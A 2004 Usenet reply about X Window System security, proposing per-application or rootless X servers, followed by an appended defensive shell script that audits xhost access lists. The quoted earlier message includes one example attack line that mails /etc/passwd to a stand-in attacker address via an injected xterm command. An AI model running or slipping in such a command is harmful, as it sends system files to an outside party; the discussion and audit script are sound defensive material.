Re: Ye Old Time Sharing System

From: Tim Bradshaw (tfb+google_at_tfeb.org)
Date: 03/24/04


Date: 24 Mar 2004 03:01:39 -0800

rpw3@rpw3.org (Rob Warnock) wrote in message news:<CEKdnRscI-V7of3d3czS-g@speakeasy.net>...
>
> And security, which is almost impossible to get around unless *you*
> securely own both ends of the connection. That is, any host that you
> allow unrestricted connections to your local X server can sniff keystrokes
> (including passwords), insert events into other windows ("Hmmm... there's
> an xterm that's currently iconified and not doing anything. Let's get it
> to do a 'cat /etc/passwd | mail badguy@cracker.dom'"), and other nasty
> stuff.

I think that the right approach to that, since most clients won't be
running X servers for day-to-day life (they're Windows machines in
other words) would be to have some kind of thing where each
application you want to run remotely has its own little X server on
top of which it runs one huge window. Or alternatively it has its own
X server but does one of these clever `rootless' things such that its
possibly-multiple X windows just sit on the native desktop. I think
XFree86 on cygwin can do this now, for instance, and things like
Exceed have been able to do it for ever.

Having a per-application server sounds extravagant, but an X server is
probably actually quite small by today's standards, and much of its
memory can probably be shared anyway. You can then ruthlessly
restrict what access this thing has to the native machine.

--tim
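
A defensive check for the exposure described in the quoted text, as an added example that is not part of either poster's message: a shell function that reads the listing printed by `xhost` (run with no arguments) and flags grants that cover a whole host rather than one user. The function name, the sample listing and the host name in it are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify the access list printed by `xhost`.
# Reads the listing on stdin, so it works on saved output as well as live:
#     xhost | audit_xhost
# Return status: 0 = only user/group-scoped grants
#                1 = host-wide or local-wide grants present
#                2 = access control disabled (any host may connect)

_bump() { [ "$status" -ge "$1" ] || status=$1; }   # keep the worst status seen

audit_xhost() {
    status=0
    while IFS= read -r line; do
        case "$line" in
            "access control disabled"*)
                echo "CRITICAL: access control is off; any host can connect"
                _bump 2 ;;
            "access control enabled"*|"")
                ;;
            INET:*|INET6:*|SI:hostname:*|SI:ipv6:*)
                # Host-based grant: every user and process on that host can
                # read input events and send synthetic ones to other windows.
                echo "HOST-WIDE: $line"
                _bump 1 ;;
            LOCAL:*)
                echo "LOCAL-WIDE: $line (every local user)"
                _bump 1 ;;
            SI:localuser:*|SI:localgroup:*)
                echo "scoped: $line" ;;
            *)
                echo "UNKNOWN: $line"
                _bump 1 ;;
        esac
    done
    return "$status"
}

# Constructed sample listing (not captured from a real machine).
SAMPLE_XHOST='access control enabled, only authorized clients can connect
INET:build.example.org
SI:localuser:tim'

printf '%s\n' "$SAMPLE_XHOST" | audit_xhost || echo "audit status: $?"
```

A non-zero status means some client other than your own user can reach the display; removing the host-wide entries or moving the remote application onto its own nested server, as suggested above, narrows that.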


